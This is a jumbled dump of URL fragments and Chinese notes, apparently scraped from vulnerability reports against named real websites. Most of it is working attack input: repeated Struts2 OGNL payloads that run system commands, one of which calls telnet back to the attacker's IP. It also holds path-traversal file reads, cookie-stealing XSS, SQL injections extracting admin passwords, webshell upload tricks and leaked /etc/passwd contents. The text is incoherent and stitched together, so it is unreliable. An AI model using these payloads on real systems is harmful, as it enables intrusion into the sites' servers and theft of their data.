/web/siterank.php?ranktype=unexisting/../../../../../../../../../../windows/System32/drivers/etc/hosts.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ /qzone/client/photo/swf/UploadPhoto.swf /qzone/client/photo/swf/UploadPhoto.swf?init_fun=alert(/xss/) / //city.qianlong.com/mycity/Manage/FileSystem/UpFile_Iframe.asp /login.php(60.28.241.196) /html/index.html(60.28.241.199) /manage/menu.htm /mycity/manage/menu.asp /mycity/Manage/FileSystem/UpFile_Iframe.asp /zlz/ /portalgprs/ /PDA_NEWS_RESOURCE/ / /index.php?act=phpinfo /manage/Pinglun/opr_plun.asp?actions=check&ID=347829&pre_page= /20101223/n5842695075872.html /fckeditor/editor/下的Fckeditor上传文件都删除了。另,为保护厂商,其中一些信息没有透漏。求 me.alipay.com /gdutlx /direct/displayLogin.do /direct/manager/addpicture.jsp?menuid=45 /direct/savepicture.do?menuid=45 /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif url('#default#time2') url('#default#time2') none /ispis/login/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'whoami\'')(d))&(h) www.acheng.gov.cn/mail/sys_order/order.asp目录猜测此战采用了百度竟价站的基本结构,访问默认数据库地址地址sys_order/database/xuanboy.mdb /nginx-securit.html http://profile.baihe.com/new/Login.action /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif /intl/zh-CN/images/logo_cn.gif url('#default#time2') url('#default#time2') / http://idea.cas.cn/login.action / /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /feed/retweet/ /p/t/xxxxxxx): /index.php?c=share&a=index&pic=http://www.baidu.com"%20onerror="alert(/xss/)&url=http://www.baidu.com&site=&title= / /UserCenter/register.aspx /siteserver /manager/html/ /ispis/login/login.action 
/tiyan/cardlogin/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /mngr/user/logout.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /pct/ /console /viewCreditsrank.php?creditsType=month&creditsKind=4 /twy/logout.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /phpmyadmin/ /iSpaceWeb/logout.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /user/index.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /logout.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /ukey/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /login.jsp /szbookmallcms/activity_net/compositionComment!list2.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /pai/html/index.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) / www.diandian.com下的页面,该页面中含有博客介绍,但输出该变量没有过滤,造成xss。 /index.action / / /ewRc /1.js /sipo/index.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b) /entlabreport/UserList.aspx /manager/login.do?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27netstat\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29 
/dbank/web/trunk/webserver/WebContent/file /dbank/web/trunk/webserver/WebContent/pc /main/open/view/index.action /graduateschool/common/index.jsp它的URL参数 /graduateschool/common/download.jsp?path=网报说明.ppt /graduateschool/common/download.jsp?path=../WEB-INF/web.xml没什么好东西 /graduateschool/common/download.jsp?path=../WEB-INF/struts-config.xml(不方便一一列举) /graduateschool/common/download.jsp?path=..\WEB-INF\classes\hibernate.cfg.xml /web/ArticleShow.action?id=5670 /admin/login.php /brand.php?brandid=1 /gsgm.asp?detailsid=17 /gsdt.asp?id=1 /show_details.asp?detailsid=1514 gov.cn WCM /wcm/ /wcm/console/auth/reg_newuser.jsp /wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx /robot/p4pages/related-question.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%20自己的IP%208888%20%22%29%27%29%28\u0023rt%20\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 / / /reportinputcommon.do /queryMoreAdvice.action /user/e.action /onlinetrain/foreground/beginStudyAction.action first’ selected’ text/html /admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp /indexph.action /action/tftj/index.action /Reg.action为漏洞网址,构造的post数据为: /themes/new,上传图片的那个form。 /content/200说的一致 /main.action /sxrd/sxrd/anwserFrontList.action /JFMXShowAction.action /site/guest/LDXX.action山西公安交警网 /v/a/list.action?channelTypeId=1 /registerAndLogin_add.action /play/channel.action?id=512&time=1229904000459831419 /shopping!clearItems.action /aspsearch!getTaobao.action /outer_chmore.action /portal/career/viewInquireCareer.action /pc/downloadClickupClient.action 
/hwatai/health/passport_download.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27netstat\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29 /portal/comm/download.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27netstat\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29 /index.action 
/kfcios/RegAction/login.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27ipconfig\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29 /account/loginUI.action?change_locale=fr /settings/ /272288/ xxxxx.tuchong.com/?view=list tuchong.com /pages/selfservice/payment/index.action?paybean.comeflag=DH&paybean.randomnum=1 /exam/index.action /newsDetail.asp?id=67 /jmCook.asp?jmdcw=67丢到穿山甲里面去看看 /kttj/indexChinaMobile.aspx /t/20050708/02/4130391.html /anglee2010/item/dffb1f122f4688a2ffded55a /saas/editEnterpriseRegister.action /specapp/index.php/%22onmouseover=prompt%289537209%29%3E /specapp/index.php(留言随意XSS)很恐怖 
/tims/blueprint/auditing/download.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27netstat\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\75@java.lang.Runtime@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29 /login.action system_r:java_t:SystemLow-SystemHigh /index!serviceSelfYW.action /admin_login/login.asp /upload/asset)和Flash跨域通信的配置文件中(http://www.diandain.com/crossdomain.xml)允许的域名相同,只需上传一个SWF,就可以读到formKey了。把这SWF嵌入到blog页面中,读到访客的formKey,调用externalInterface把值给输到JS里,又能worm了吧。 /index.php/%22onmouseover=prompt%289537209%29%3E https://www.ezhangdan.com/login/toMemberReg.action /index.action /login.asp www.diandian.com这个域下。 www.diandian.com域下的xss或者其它方式来获取formkey才能进行后续的传播操作。 www.diandian.com域下的xss。 www.diandian.com域下搜索不到flash文件。 www.diandian.com /blog/fm/iframe/reggaesky /blog/fm/iframe/wooyuntest /js/app/fm.$6765.js /edit/02c85840-c297-11e1-9a22-782bcb38253b /./images/album/img60/1260/66481314675280_1.jpg /blog/fm/iframe/wooyuntest www.diandian.com /diandian.js /./images/album/img60/1260/66481314675280_1.jpg /diandian.js /jq.js /wall",function(rs) /customize/"+name,function(info) /blog/fm/iframe/wooyuntest\ none\ /n/customize/source",data,callback /n/customize /blog/fm/iframe/wooyuntest\ none\ /blog/fm/iframe/wooyuntest 
none /blog/fm/iframe/wooyuntest none /v1.0.0245/v/swf/loader.swf此FLash接受imglogo参数作为图片地址 /v1.0.0245/v/swf/loader.swf?VideoIDS=XMzU2MDk0MDQ0&winType=BDskin&embedid=MTI1LjExOS4xNTMuNDQCODkwMjM1MTECAg%3D%3D&wd=&partnerid=XOTcy&&imglogo=http://localhost:8080/flashsec/redirect_evil_url.swf /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs%28jjdm-%28length%28%28select%20distinct%20table_name%20from%20information_schema.tables%20where%20table_schema=0x66696E616E6365%20limit%201,1%29%29=6%29*8000%29&ordertype=asc /finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=abs alert(document.cookie);void(0) /index.action /emall/index.action /emall/index.action /tag/xxxx /tag/wooyunworm的源码)。 /edit/3ba11ee0-c251-11e1-90a9-782bcb32ff27 /tag/wooyunworm /tag/wooyunworm /ease-web/index.action /inviteall!nologin.action?uid=47A41632FF59E7EF601940895D875512 /beian/user/registeraction.action /EassolSSOWeb/registerAction.action?from=englishOK /Knowledge/know/searchAction.action?word=3G&fieldName=createDate&fieldSort=desc /site/guest/searchAction.action?curPage=1&contentValue= /spgbid/homeAction/searchAction.action?search=search&msg= /SearchAction.action?query=%E5%85%A8%E9%83%A8%E6%B4%BB%E5%8A%A8&category=%E7%99%BB%E5%B1%B1&pager.offset=64 /shop/store!toApply.action /cjh/cjh!toApply.action /Register.action /front/userlogin!register.action /register.action?memId=103658918 /register.action?register.activity.id=1736738&user.id=2 /register.action /xxfw/register.action /a/pre-register.action?redirectUrl=http%3A//www.qiaogu.com/ /account/register.action /register.action /www/account/register.action /register.action /user/register.action /QQcaca/userManage/register.action 
/system/register.action /service/red_present_step1.xhtml?BON_ID=120525000*************&BON_NM=全省***&BON_AMT=20&ISS_ID_NM=移动&EXP_DT=20120731 /service/red_present_step2.xhtml?RCV_MBL_NO=接受号码&MBL_NO=赠送号码&BON_ID=120525000*************&&BON_NM=12580**********&BON_AMT=2&ISS_ID_NM=%C9%CF&EXP_DT=20120731&CHECK_MBL_NO=接受号码 /mayi.website/upload/20120630042642423.jpg上传好了这样一个图片文件然后在图片后缀的后面加上1.phphttp://www.gamemayi.com/mayi.website/upload/20120630042642423.jpg/1.php服务器就会让这张图片以PHP的方式运行进而获取到网站权限 /mayi.website/web!index.action alert(document.cookie);void(0) alert(document.cookie);void(0) /plus/search.php?keyword=d 218.28.225.250 / / /city_comment_614#i_comment /test.php?cookie= /luxury/list.php?type=category&cid=2 /luxury/list.php?type=country&gid=11 /main/c?db=ifeng&bid=11026,10796,2433&cid=1420,61,1&sid=23419&advid=318&camid=2539&show=ignore&url=http://www.wooyun.org /user/myword.php?pno=1 common/common_info.action?wid= /query/business/query/queryTableAction$searchTable3.action /epp-ppp/pm/notice/notice!viewBlockNotice.action?curId=4&locMsg=2*/3,schemaname,null,null,null,null,null%20from%20syscat.schemata%20fetch%20first%201%20rows%20only--&ids=4|3|2%29%20and%201=2%20union%20select/* /act2012/jump/?url=http://gotofun.cn/url?15329&subtemplate=gray&evil=0 /exploits/19525/ /app/appOut.action /?s=vod-read-id-1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(0x40,admin_id,0x40,admin_name,0x40,admin_pwd,0x40),28,29%20from%20pp_admin--.html /passport/腾讯后台任意QQ号码登陆但是没权限 /nantiankb/admin/article/article/DownloadTFile.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'netstat\'')(d))&(h) /cps/membercenter/memberinfo.action /cps/membercenter/account.action /roco/search.php?s=/module/action/param1/${@phpinfo() /login.jsp 
/redir.php?url=http://www.baidu.com /portalhx/WapSiteindex.action /.svn/text-base/validate_login.jsp.svn-base /Views/findpwd.aspx,利用通配符加短标签构造出http://perfectrisingstar.wanmei.com/Views/fa*~1*/.aspx访问这个地址IIS会返回给我们一个错误,大多数是bad /Views/fi*~1*/.aspx返回404,说明存在以fi开头的文件,利用这个特性我们仅需要对每一位循环遍历26个字母就可以获取文件短文件名称,由于短文件名的规律为前6个字符+~1-9+扩展名前三位,我们可以根据短文件名结果推测或配合字典暴力猜测文件全名,测试后缀名构造http://perfectrisingstar.wanmei.com/Views/findpw~1.*/.aspx即可 /Views/findpw~1.%3f%3f/.aspx单独位匹配测试 /index.action?templatePageDO.templatePageId=3767&templatePageDO.shopId=10921 / com.douban.shuo/shared_prefs/app.Login.xml /lmzq!intro.action /login /index.php?module=Users&action=Login /shell.php /SFMobile.xml /shopping/account.action /sxscz/opinion_question.action?optionId=4028b394375397fb013753daa7860005 /imageland/exhibition/detail.action?exhibitionId=295 /publish/login.php /news/s7/show.php?name=5 123.125.116.190 /phpinfo.php /用户后台中 douban.fm/js/.svn/entries /game/tag/softList.action /XLInformation/getSchoolContent.action /view.do?code=146219443&v=2 /view.do?v=2&sid=431b965d858e452c8f4453***(就是此处的SID)&code=146240234 img.php*/ image/png /setup/ /sc/s/babyfifa/upload.html /sc/s/babyfifa/upload.html /viewthread.php?tid=791 xunlei..com /code_svn/ test /gzZhengWu.action /onShow.action /cn/dosearch/?srchtxt=%22%3E%3Cscript%3Ealert%28/wooyun/%29%3C%2Fscript%3E%3C&srchtype=fulltext /%3c/%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e /%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e /photowall.aspx?AreaKeyWord=142 x:502:0::/www/bbs.weiphone.com/:/bin/bash x:503:503::/www/bbs.weand.com:/sbin/nologin x:504:500::/www:/bin/bash x:505:505::/www/act.weiphone.com/:/sbin/nologin /api/Xmlrpc/index/ / /member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@ 
/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@ /xml-entity-injection.html /vuldb/ssvid-60242 /security/advisory/ZF2012-01 shop.adidas.cn shop.adidas.cn/api/Xmlrpc/index/ shop.adidas.cn/info.php shop.adidas.cn/api/Xmlrpc/index拿到passwd /etc/passwd x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:81:81:System /:/sbin/nologin x:113:113:usbmuxd /:/sbin/nologin x:16:16:Special /home/oprofile:/sbin/nologin x:32:32:Rpcbind /var/cache/rpcbind:/sbin/nologin x:170:170:Avahi /var/lib/avahi-autoipd:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:499:496:RealtimeKit:/proc:/sbin/nologin x:173:173::/etc/abrt:/sbin/nologin x:96:96::/var/lib/hsqldb:/sbin/nologin x:498:76:"Saslauthd /sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:70:70:Avahi /var/run/avahi-daemon:/sbin/nologin x:89:89::/var/spool/postfix:/sbin/nologin x:497:494:Owner /var/lib/qpidd:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:65534:65534:Anonymous /var/lib/nfs:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:59:59:Account /dev/null:/sbin/nologin x:75:75:radvd /:/sbin/nologin x:107:107:qemu /:/sbin/nologin x:27:27:MySQL /var/lib/mysql:/bin/bash x:496:493:PulseAudio /var/run/pulse:/sbin/nologin x:42:42::/var/lib/gdm:/sbin/nologin x:500:500:Guest:/home/xguest:/bin/bash x:155:155:Systemtap /var/lib/stap-server:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:495:487:UUID /var/lib/libuuid:/sbin/nologin 
